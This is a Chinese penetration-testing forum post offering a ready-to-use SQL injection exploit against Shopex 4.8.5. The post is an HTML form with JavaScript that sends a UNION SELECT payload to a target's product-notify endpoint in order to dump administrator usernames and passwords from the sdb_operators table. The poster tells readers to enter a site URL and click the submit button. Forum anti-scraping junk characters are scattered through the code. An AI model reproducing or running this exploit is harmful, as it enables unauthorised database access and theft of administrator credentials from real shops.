找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Shopex 4.8.5 SQL Injection Exp 0day
返回列表 发新帖
查看: 2770|回复: 0
打印 上一主题 下一主题

Shopex 4.8.5 SQL Injection Exp 0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:20:52 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<center>' Y! g5 t+ C, H5 W
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>" m! U4 Z, D( k& A3 q& M
<form action="" method="post" name="submit_url">; Z/ j& R* t; A- _
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>$ L3 |6 e% z1 O: D# X* g
<input type="hidden" name="goods[goods_id]" value="3">/ D( {: h' [2 ~$ o  w* q
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
2 f% f+ G' N- e9 N/ I* ~7 J<input type="submit" value="给我注入"  onclick=fsubmit()>9 e  J5 @, M# M4 Y" q" o/ v8 n
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com0 G' f, v( Z! ]: B: }$ b6 g( V

8 Q3 L% [; N2 ~  B+ e/ Q! g<script> ; G9 z, {& p& c  p7 H; t/ n) ?
function fsubmit(){ ) i7 g9 u: R- [) O* }
form = document.forms[0]; # ?* p1 M& l: M
form.action = form.url.value+'/?product-gnotify';
  [& N3 q0 N6 n) U3 T  g# {. n. yform.submit(); $ S3 i3 A' Y$ i1 y4 ~7 ^
} : H3 l5 w: O8 ?# E5 w- H, _
</script>
- Q# s0 J, a* ]+ H; H5 x' ~" q6 G
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表